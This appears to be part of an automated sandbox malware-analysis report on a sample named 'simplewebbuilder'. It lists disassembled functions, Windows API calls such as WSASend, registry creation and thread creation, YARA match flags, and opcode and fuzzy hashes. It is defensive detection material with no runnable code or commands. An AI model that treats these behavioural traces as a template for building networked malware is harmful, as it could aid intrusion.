                                                                                                                            • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,009BAF7F,00000000), ref: 009C2745
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleResumeThread__beginthreadex
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1685284544-0
                                                                                                                            • Opcode ID: bee2db1af203efb2e9071c01cfda4f4bb8a15050d7a239b68ad9eeb9bb0b5783
                                                                                                                            • Instruction ID: ec4360f27e5deabee85f512d334ebbf7d1e4bb4b71b2fb6db318438122808e5d
                                                                                                                            • Opcode Fuzzy Hash: bee2db1af203efb2e9071c01cfda4f4bb8a15050d7a239b68ad9eeb9bb0b5783
                                                                                                                            • Instruction Fuzzy Hash: B6F0CD74640200ABD7209FA8DCC4F92B3E8AF88324F24456EF248D7291C7B1AC829A90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004028F4 Relevance: 4.5, APIs: 3, Instructions: 33registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEventValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3274066644-0
                                                                                                                            • Opcode ID: 209db688da663990ababfa8a3be71d832d70751f18bec2ef4f685129f17de6b3
                                                                                                                            • Instruction ID: 86b2b9efb9512c9e85355195ae1ef4b66b18e5f852848c4cf76d258d7771ada9
                                                                                                                            • Opcode Fuzzy Hash: 209db688da663990ababfa8a3be71d832d70751f18bec2ef4f685129f17de6b3
                                                                                                                            • Instruction Fuzzy Hash: 19F09034504142ABD7115B78AF365AA3BA8E7063607448279FAE6F20F2C731084ADB2D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B1AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InterlockedIncrement.KERNEL32(009E82BC), ref: 009B1ABA
                                                                                                                            • WSAStartup.WS2_32(00000002,00000000), ref: 009B1ACB
                                                                                                                            • InterlockedExchange.KERNEL32(009E82C0,00000000), ref: 009B1AD7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked$ExchangeIncrementStartup
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1856147945-0
                                                                                                                            • Opcode ID: aaadd2db37ee9d9c59700061fad6ba60167f5d6b5097593ce58c8f8ce63ca441
                                                                                                                            • Instruction ID: 39f4dbcdd96a7d01c19792b13d0d60b5cf5dfe7793dbe64d8f0f28c75b1f8969
                                                                                                                            • Opcode Fuzzy Hash: aaadd2db37ee9d9c59700061fad6ba60167f5d6b5097593ce58c8f8ce63ca441
                                                                                                                            • Instruction Fuzzy Hash: 85D02E304AAA041BC2117BE0AC0EABA332CE701724F000202FE38C01C1EE002A0892A2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009EF272 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 78fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009EB000.00000040.00001000.00020000.00000000.sdmp, Offset: 009EB000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9eb000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteFile
                                                                                                                            • String ID: 1eh[
                                                                                                                            • API String ID: 4033686569-1985093824
                                                                                                                            • Opcode ID: f1dcbfb00d0c41d48b7ae3896cc46f66978d50b1edb610be155053937db11fb4
                                                                                                                            • Instruction ID: cd08071473b866bb9daa0c3009ff090e237319c21b6ebe8c2aebcbcea4ffb622
                                                                                                                            • Opcode Fuzzy Hash: f1dcbfb00d0c41d48b7ae3896cc46f66978d50b1edb610be155053937db11fb4
                                                                                                                            • Instruction Fuzzy Hash: 702130B281C6209FE711AF0CD88167ABBE9FF84714F46492EEAC887700D63558548BD7
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B4D01 Relevance: 3.1, APIs: 2, Instructions: 137COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B4D06
                                                                                                                              • Part of subcall function 009B1BA7: __EH_prolog.LIBCMT ref: 009B1BAC
                                                                                                                              • Part of subcall function 009B1BA7: RtlEnterCriticalSection.NTDLL ref: 009B1BBC
                                                                                                                              • Part of subcall function 009B1BA7: RtlLeaveCriticalSection.NTDLL ref: 009B1BEA
                                                                                                                              • Part of subcall function 009B1BA7: RtlEnterCriticalSection.NTDLL ref: 009B1C13
                                                                                                                              • Part of subcall function 009B1BA7: RtlLeaveCriticalSection.NTDLL ref: 009B1C56
                                                                                                                              • Part of subcall function 009BE6EE: __EH_prolog.LIBCMT ref: 009BE6F3
                                                                                                                              • Part of subcall function 009BE6EE: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009BE772
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 009B4E06
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1927618982-0
                                                                                                                            • Opcode ID: 6d78220e98a3aadf23a71f8d7d0a7017f95701bc348d6b6f4da9f7739ad0b557
                                                                                                                            • Instruction ID: 9fc368ff934877e6b8087da340514c92cdb67f8a611830695d080564b99e7cd6
                                                                                                                            • Opcode Fuzzy Hash: 6d78220e98a3aadf23a71f8d7d0a7017f95701bc348d6b6f4da9f7739ad0b557
                                                                                                                            • Instruction Fuzzy Hash: 265106B1D04248DFDB15DFA8C985AEEBBB8BF48320F14815AE905AB352DB309A44CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B2D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 009B2D47
                                                                                                                            • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 009B2D5C
                                                                                                                              • Part of subcall function 009BAAFF: WSAGetLastError.WS2_32(00000000,?,?,009B2A51), ref: 009BAB0D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Send
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1282938840-0
                                                                                                                            • Opcode ID: e7983f8136c4881493e1e20370c21901bde9da8ecff1419bbc6e0451dc717914
                                                                                                                            • Instruction ID: 8e7f34f14b861435120ebc1fed66aeaab210bdaf674616b2a8ac07c5828d11db
                                                                                                                            • Opcode Fuzzy Hash: e7983f8136c4881493e1e20370c21901bde9da8ecff1419bbc6e0451dc717914
                                                                                                                            • Instruction Fuzzy Hash: D60171B5908209AFD7205F9489459BBBBECEB853A0720092EF95983241EB749D409761
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040219D Relevance: 3.0, APIs: 2, Instructions: 42libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 0040D6ED
                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0040D958
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastLibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3568775529-0
                                                                                                                            • Opcode ID: a9def0bf551afe8d5b5f8f912a45cb02ec31bcb4f94fc6bdb3a69ea8c1d69d81
                                                                                                                            • Instruction ID: 49d1aff47abafecded84190605afdff1066edc2e26bb2c2c042406fd2b805b83
                                                                                                                            • Opcode Fuzzy Hash: a9def0bf551afe8d5b5f8f912a45cb02ec31bcb4f94fc6bdb3a69ea8c1d69d81
                                                                                                                            • Instruction Fuzzy Hash: 4A015E74944301EFDF148FA0C998BA937A0BB10341F2440BF94067A1C1C7B8954EDB1A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040344A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00403171,00000000), ref: 0040345B
                                                                                                                              • Part of subcall function 00403302: GetVersionExA.KERNEL32 ref: 00403321
                                                                                                                            • HeapDestroy.KERNEL32 ref: 0040349A
                                                                                                                              • Part of subcall function 004034A7: HeapAlloc.KERNEL32(00000000,00000140,00403483,000003F8), ref: 004034B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2507506473-0
                                                                                                                            • Opcode ID: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
                                                                                                                            • Instruction ID: e60f5d10070dd6772d4a54549668055c4e54cd76725331d0105a0707e5516faa
                                                                                                                            • Opcode Fuzzy Hash: f0438f0bb9433fd2cee44227ebe2dc5bd00815c0002ba7a5fda9cc732afbe5d7
                                                                                                                            • Instruction Fuzzy Hash: 58F0657461430299EB215F719E4772A2E98DB54797F10453BF406FC1D0EB7C86819909
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040256A Relevance: 3.0, APIs: 2, Instructions: 22libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 0040D6ED
                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0040D958
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastLibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3568775529-0
                                                                                                                            • Opcode ID: 7d91f3f71a58ca5ef36d9b339566e66e8228242bdf57f6d8db26d0650466031c
                                                                                                                            • Instruction ID: 3ba79c946bc34c5998dbd68cc4816631b79ad35567c2f08864999d5ce10e5574
                                                                                                                            • Opcode Fuzzy Hash: 7d91f3f71a58ca5ef36d9b339566e66e8228242bdf57f6d8db26d0650466031c
                                                                                                                            • Instruction Fuzzy Hash: C8E0DF75A04201EFDF045FA0CD147A93F70AB00300F24857BA906AE2C0C778D94AE719
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D67E Relevance: 3.0, APIs: 2, Instructions: 19libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 0040D6ED
                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0040D958
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastLibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3568775529-0
                                                                                                                            • Opcode ID: dc53ccdba5527e5d2d33a22c99ccd100c3a738843860b56e70a84a83ae303bb6
                                                                                                                            • Instruction ID: 82cee3b13c60f88dc0d042c1c485f390ac59a954139c271d064072580974aa47
                                                                                                                            • Opcode Fuzzy Hash: dc53ccdba5527e5d2d33a22c99ccd100c3a738843860b56e70a84a83ae303bb6
                                                                                                                            • Instruction Fuzzy Hash: DEE0C276A00200EBDF001FB0DD587AD3F60BF14700F20853FB502B9280C7B8C44A9719
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009B522D Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009B5232
                                                                                                                              • Part of subcall function 009B3D7E: htons.WS2_32(?), ref: 009B3DA2
                                                                                                                              • Part of subcall function 009B3D7E: htonl.WS2_32(00000000), ref: 009B3DB9
                                                                                                                              • Part of subcall function 009B3D7E: htonl.WS2_32(00000000), ref: 009B3DC0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: htonl$H_prologhtons
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4039807196-0
                                                                                                                            • Opcode ID: a4e53e3ed304df738cbfdad877587925257feabbdf824a58086524e7c8c5057a
                                                                                                                            • Instruction ID: b32b12ef4bf9b55b8883469ad743b1f67cca13a41123e7bb8f46392799d70bff
                                                                                                                            • Opcode Fuzzy Hash: a4e53e3ed304df738cbfdad877587925257feabbdf824a58086524e7c8c5057a
                                                                                                                            • Instruction Fuzzy Hash: BE815C71D0424ECECF05DFA5D190AEEBBB9EF48320F20816AE815B7241E6355A46CF71
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BEFB7 Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009BEFBC
                                                                                                                              • Part of subcall function 009B1A01: TlsGetValue.KERNEL32 ref: 009B1A0A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prologValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3700342317-0
                                                                                                                            • Opcode ID: d43e07f0d0e6018e60b7a6e7ed6f6dbd2d754ad07d372c417d39fdac5553ee95
                                                                                                                            • Instruction ID: c60522a1c34352c0c138ad2adf6d1be4d48d6bc6b0b6747be11dddaa5b655510
                                                                                                                            • Opcode Fuzzy Hash: d43e07f0d0e6018e60b7a6e7ed6f6dbd2d754ad07d372c417d39fdac5553ee95
                                                                                                                            • Instruction Fuzzy Hash: D22151B1904209AFDB10DFA4D951BFEBBF8EF48324F10812EE904E3241D771AA05DBA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BEB47 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009BEB4C
                                                                                                                              • Part of subcall function 009B26DB: RtlEnterCriticalSection.NTDLL(?), ref: 009B2706
                                                                                                                              • Part of subcall function 009B26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 009B272B
                                                                                                                              • Part of subcall function 009B26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009D6153), ref: 009B2738
                                                                                                                              • Part of subcall function 009B26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 009B2778
                                                                                                                              • Part of subcall function 009B26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 009B27D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4293676635-0
                                                                                                                            • Opcode ID: 75f94db2009932880003c50973f9f48c36c7d70d2d1cf223a6f5526036f31199
                                                                                                                            • Instruction ID: ddf6db34be7baf27ddd999529f355406ff1910e4138c9a8743060fea4c0ba14e
                                                                                                                            • Opcode Fuzzy Hash: 75f94db2009932880003c50973f9f48c36c7d70d2d1cf223a6f5526036f31199
                                                                                                                            • Instruction Fuzzy Hash: D1019AB5950B049FC728DF1AC540A89FBF4EF88310B15C6AF94498B722E7B1AA40CF94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009BE926 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 009BE92B
                                                                                                                              • Part of subcall function 009C414C: _malloc.LIBCMT ref: 009C4164
                                                                                                                              • Part of subcall function 009BEB47: __EH_prolog.LIBCMT ref: 009BEB4C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4254904621-0
                                                                                                                            • Opcode ID: 1139aa016547f508eb77ccfa048664ad1917fb4ba1cc919472c2fb51aa668699
                                                                                                                            • Instruction ID: cd04cdf8abc999f65265e3a80785046110c3e37e59e5877cd696a4560abe3faf
                                                                                                                            • Opcode Fuzzy Hash: 1139aa016547f508eb77ccfa048664ad1917fb4ba1cc919472c2fb51aa668699
                                                                                                                            • Instruction Fuzzy Hash: 7AE0C271A44606ABDF0CEFA8D812BADB7A8EB84310F00866EB80AE2740EF705900C754
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C3A52 Relevance: 1.5, APIs: 1, Instructions: 19COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009C625A: __getptd_noexit.LIBCMT ref: 009C625B
                                                                                                                              • Part of subcall function 009C625A: __amsg_exit.LIBCMT ref: 009C6268
                                                                                                                              • Part of subcall function 009C3A93: __getptd_noexit.LIBCMT ref: 009C3A97
                                                                                                                              • Part of subcall function 009C3A93: __freeptd.LIBCMT ref: 009C3AB1
                                                                                                                              • Part of subcall function 009C3A93: RtlExitUserThread.NTDLL(?,00000000,?,009C3A73,00000000), ref: 009C3ABA
                                                                                                                            • __XcptFilter.LIBCMT ref: 009C3A7F
                                                                                                                              • Part of subcall function 009C9394: __getptd_noexit.LIBCMT ref: 009C9398
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1405322794-0
                                                                                                                            • Opcode ID: df9bdebd53230cc59a4c7a74ae3c870d7d799d4c8298179ef120df8b28ec40cf
                                                                                                                            • Instruction ID: e4e4197a3ddff3a6db0268358bc36149cb35668e0ec422738fb3e942b91688cb
                                                                                                                            • Opcode Fuzzy Hash: df9bdebd53230cc59a4c7a74ae3c870d7d799d4c8298179ef120df8b28ec40cf
                                                                                                                            • Instruction Fuzzy Hash: FAE0ECB1D047059FEB08ABA4D84EF2D7775AF84305F21408CF101AB2A2DA75AD40DB22
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402658 Relevance: 1.5, APIs: 1, Instructions: 5registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002), ref: 0040DBEE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Create
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2289755597-0
                                                                                                                            • Opcode ID: 5cb30d95e254f2493f2c871883abafa48a07f48bba8b5c1fe5b13ac725e6a5b6
                                                                                                                            • Instruction ID: 70df6b8cdff81a6c30c4ca399a78438459f6f472847ca99cc4bc3710177247c3
                                                                                                                            • Opcode Fuzzy Hash: 5cb30d95e254f2493f2c871883abafa48a07f48bba8b5c1fe5b13ac725e6a5b6
                                                                                                                            • Instruction Fuzzy Hash: 97A00120608501EAE2501AA25F0D7262569DB05649F22087A6A5BF6091DA79906AA92F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040286E Relevance: 1.5, APIs: 1, Instructions: 5threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: 0c7ee1cc73cfdaeef6b567d635646d1599ea5fe8a9a2914a0dbf5fe02a1caa74
                                                                                                                            • Instruction ID: b8bf24d317afa3ceebc9473ffeb10f3211ca65595062ed6c02d19fe1b4d66eae
                                                                                                                            • Opcode Fuzzy Hash: 0c7ee1cc73cfdaeef6b567d635646d1599ea5fe8a9a2914a0dbf5fe02a1caa74
                                                                                                                            • Instruction Fuzzy Hash: 44A00171819411AAC6245A945E48925252871193B53350B7AA173B50E08A38400A662A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 009C2760 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 009C1C10: OpenEventA.KERNEL32(00100002,00000000,00000000,C05FB8F7), ref: 009C1CB0
                                                                                                                              • Part of subcall function 009C1C10: CloseHandle.KERNEL32(00000000), ref: 009C1CC5
                                                                                                                              • Part of subcall function 009C1C10: ResetEvent.KERNEL32(00000000,C05FB8F7), ref: 009C1CCF
                                                                                                                              • Part of subcall function 009C1C10: CloseHandle.KERNEL32(00000000,C05FB8F7), ref: 009C1D04
                                                                                                                            • TlsSetValue.KERNEL32(00000026,?), ref: 009C27AA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9b1000_simplewebbuilder.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseEventHandle$OpenResetValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1556185888-0
                                                                                                                            • Opcode ID: fdc3fb34052b9f95ab4003739b66ed4d7d87698180de469d7e6b2ec95c208176
                                                                                                                            • Instruction ID: d3890c4a925ab2e9a524bbddd9d74bcb15111cb689a53b50e11117a02b7621f2
                                                                                                                            • Opcode Fuzzy Hash: fdc3fb34052b9f95ab4003739b66ed4d7d87698180de469d7e6b2ec95c208176
                                                                                                                            • Instruction Fuzzy Hash: 36018F71A44244ABC700CF99DC45F5ABBA8EB49761F10462AF824D33C1D731A90086A5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00A2938F Relevance: 1.3, APIs: 1, Instructions: 14sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3390140263.00000000009EB000.00000040.00001000.00020000.00000000.sdmp, Offset: 009EB000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_9eb000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 91b30dd963cefe388162bafb3b12ddf6161199e373035897bd49151b6d8bd542
                                                                                                                            • Instruction ID: 08cde1a41c6ef7632196307b1d2239d9bb9ff5edf865f0f0f8b948e97b87b7e3
                                                                                                                            • Opcode Fuzzy Hash: 91b30dd963cefe388162bafb3b12ddf6161199e373035897bd49151b6d8bd542
                                                                                                                            • Instruction Fuzzy Hash: 97D0A772C7D234D7CA403A9C7C0446773AC9A15610F090035CC4153700F952A91042D3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402181 Relevance: 1.3, APIs: 1, Instructions: 10sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 004025D7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.3332985584.0000000000400000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000011.00000002.3332985584.000000000040B000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_400000_simplewebbuilder.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
